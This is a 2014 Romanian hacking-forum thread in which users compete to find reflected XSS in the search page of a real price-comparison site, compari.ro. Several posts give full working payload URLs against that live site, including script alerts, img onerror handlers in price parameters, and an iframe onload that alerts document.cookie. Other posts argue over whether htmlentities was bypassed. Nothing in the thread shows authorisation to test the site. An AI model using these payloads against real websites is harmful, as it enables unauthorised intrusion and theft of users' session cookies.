Goke Posted June 8, 2014 Report Posted June 8, 2014 (edited) http://www.compari.ro/CategorySearch.php?st=vectorul sa fie exact dupa ?st=genhttp://www.compari.ro/CategorySearch.php?st=<script>alert(1)</script>ci nu http://www.compari.ro/CategorySearch.php?st=graficard&noredirect=&minprice=%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm%281%29%3E&maxprice=%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm%281%29%3E&orderby=9Facut de cineva...(nu dau nume)http://i.imgur.com/stLQEdk.pngNU AS FI VRUT SA DAU HINT... CA DUPA S-AR PRINDE TOATA LUMEA .. CRED CA VOI REGRETA DAR IN FINE HINT=" + " Edited June 27, 2014 by Goke 1 Quote
askwrite Posted June 8, 2014 Report Posted June 8, 2014 Imi pare rau ca ai sters topicul vechi, in care iti luasei fail si ai spus ca parametrul este st dar tu facusei xssul la compara pret.Cum mi-am dat seama?1.Daca bagi orice vector in search, nu iti apare nimic, niciun rezultat, pe cand tie ti-au aparut rezultate care nu au treaba.2.Cenzurasei campul de la compara pret.3.Aveai prtscr la fel ca al meu. (adica era in acelasi loc) Quote
Goke Posted June 8, 2014 Author Report Posted June 8, 2014 (edited) in cel vechi poate , dar aici e alta situatie. vectorul trebuie sa fie exact dupa ?st=daca cineva gaseste 2 vectori il felicit.. eu am gasit doar unul singur-@danyweb09 http://prntscr.com/3qr3yv Edited June 8, 2014 by Goke Quote
Active Members dancezar Posted June 8, 2014 Active Members Report Posted June 8, 2014 Ok poti sa ne dai un alert(document.domain) ms:) Quote
Goke Posted June 11, 2014 Author Report Posted June 11, 2014 Haideti oameni buni. Chiar nimeni nu e in stare sa rezolve acest challenge ? 200 views la post .. Quote
SilenTx0 Posted June 11, 2014 Report Posted June 11, 2014 Goke said: //Stiind ca a face bypass la htmlentities este un lucru imposibil ,uitati ca aici nu este imposibil ^_^// Bypass la htmlentities se poate face in unele cazuri ideale.Iin cazul tau vectorul executat nu este cel afisat prin htmlentities, n-ai facut nici un bypass stai linistit. Quote
askwrite Posted June 11, 2014 Report Posted June 11, 2014 E afisat cu htmlspecialchars si si-a luat fail si la primul topic cu challengeu asta cand a zis ca e la parametrul st iar acum la fel. Quote
.Breacker Posted June 21, 2014 Report Posted June 21, 2014 Quote [1:06:14 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: ma ajuti cu un host ?[1:06:18 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: free[1:06:22 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: ca am de la hostinger[1:06:24 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: si[1:06:28 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: numi place ,,[1:06:35 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: mai demult mergea[1:06:50 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: miam facut un script de conecatre la baza de date vulnerabil la sqli[1:06:59 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: dar acum cand incerc order by[1:07:01 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: nu mai merge[1:07:08 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: si cred ca e de la hostMda,cam a?a ceva pe skype. 1 Quote
Goke Posted September 24, 2014 Author Report Posted September 24, 2014 hahaha nimeni nu reuseste sa il facachiar daca este foarte simplu Quote
QUADMACHINE Posted September 24, 2014 Report Posted September 24, 2014 Stagiu militar: nesatisfacut.http://i.imgur.com/2OlEpdi.png Quote
EAdrian Posted September 24, 2014 Report Posted September 24, 2014 QUADMACHINE said: Stagiu militar: nesatisfacut.http://i.imgur.com/2OlEpdi.pngDe ce ai cenzurat link-ul? Quote
QUADMACHINE Posted September 24, 2014 Report Posted September 24, 2014 Scuze compari.ro/CategorySearch.php?st=“/><script>alert(1);</script>compari.ro/CategorySearch.php?st=‘>aaaaa<script>alert(document.cookie)</script>compari.ro/CategorySearch.php?st=->”<''<iframe src=http://rstforums.com onload=alert(document.cookie)< Quote
shaggi Posted October 2, 2014 Report Posted October 2, 2014 Quote Cautare: </h1><script>alert("time is relative, but shaggi is the best")</script><h1>doar pe ffx mere, pe chrome nu mere Quote
.Breacker Posted October 2, 2014 Report Posted October 2, 2014 În acel searchbox se vede vectorul. Quote
QUADMACHINE Posted October 2, 2014 Report Posted October 2, 2014 Cu plus ..CategorySearch.php?st=+<img src='xss.swf' onerror=alert(1)> Quote